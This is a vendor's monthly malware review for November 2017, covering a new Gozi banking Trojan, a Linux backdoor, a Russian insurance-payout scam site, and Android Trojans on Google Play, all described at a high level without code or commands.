The page may not load correctly.
November 30, 2017
In November, Doctor Web specialists analyzed a new representative of the Trojan.Gozi banking Trojan family. Unlike its predecessors, the new Trojan completely consists of a set of modules and no longer possesses the mechanism needed to generate control server domain names. Server addresses are now hard-coded into the malware program’s configuration.
Also in November, a new backdoor for Linux and several fraudulent websites were found. Cybercriminals used these websites to fleece money from Internet users on behalf of a nonexistent public fund.
The Gozi banking Trojan family is well known to security researchers: one of its representatives is famous for using a text file downloaded from a NASA server as a dictionary for generating control server addresses. The new version of the banking Trojan, dubbed Trojan.Gozi.64, can infect computers running 32- and 64-bit versions of Windows 7 and later. The malicious program does not run on earlier Windows versions.
Trojan.Gozi.64’s main purpose is to perform web injections, which means it can inject arbitrary content into webpages users are browsing— for example, fake authorization forms on bank websites and in online banking systems.
In addition, due to the fact that webpage modification is performed directly on an infected computer, the URL of the website involved remains intact in the browser address bar. This may prevent the user from realizing that something is amiss. Any data the user enters into a fake form is sent to cybercriminals, which results in the account of the Trojan’s victim possibly being compromised.
In November, cases involving the following ransomware modifications were registered by Doctor Web’s technical support service:
During November 2017, the URLs of 331,895 non-recommended websites were added to the Dr.Web database.
In November, Doctor Web described a new fraudulent scheme that has spread in the Russian segment of the Internet. Cybercriminals have been sending out spam with a link to a website allegedly belonging to a certain “The Interregional Social Fund of Development”. Referring to a nonexistent Decree of the Government of the Russian Federation, the cybercriminals offer to do a check for website visitors to tell them whether they are owed any payouts from various insurance companies. Visitors need to supply their personal insurance policy number (SNILS) or passport number. No matter what kind of data the victim fills in (it can be an arbitrary sequence of numbers), they receive a message telling them that they have been apportioned insurance payments for quite a large sum—several hundred rubles. However, in order to withdraw these savings, the cybercriminals demand a payment.
Virus analysts have detected many other fraudulent projects on the servers containing the webpages of “The Interregional Social Fund of Development”. For more details, please refer to the review on our website.
In late November, Doctor Web security researchers analyzed a new backdoor for Linux named Linux.BackDoor.Hook.1. This Trojan can download files indicated in a command it receives from cybercriminals, launch applications, or connect to a specific remote host. All the features of Linux.BackDoor.Hook.1 are described in our review.
In November, Doctor Web security researchers detected the Trojan Android.RemoteCode.106.origin on Google Play. This Trojan downloads additional malicious modules that load websites and tap on advertisements and links. In addition, malicious programs from the Android.SmsSend family, which send expensive messages, were found in the directory. Also in the past month, the Trojan Android.CoinMine.3 was distributed via Google Play. It used infected mobile devices to mine the Monero cryptocurrency. Furthermore, a large number of banking Trojans from the Android.Banker family were detected on Google Play. These Trojans are designed to steal private user information and money from Android user bank accounts.
The following November events related to mobile malware are the most noteworthy:
Find out more about malicious and unwanted programs for mobile devices in our special overview.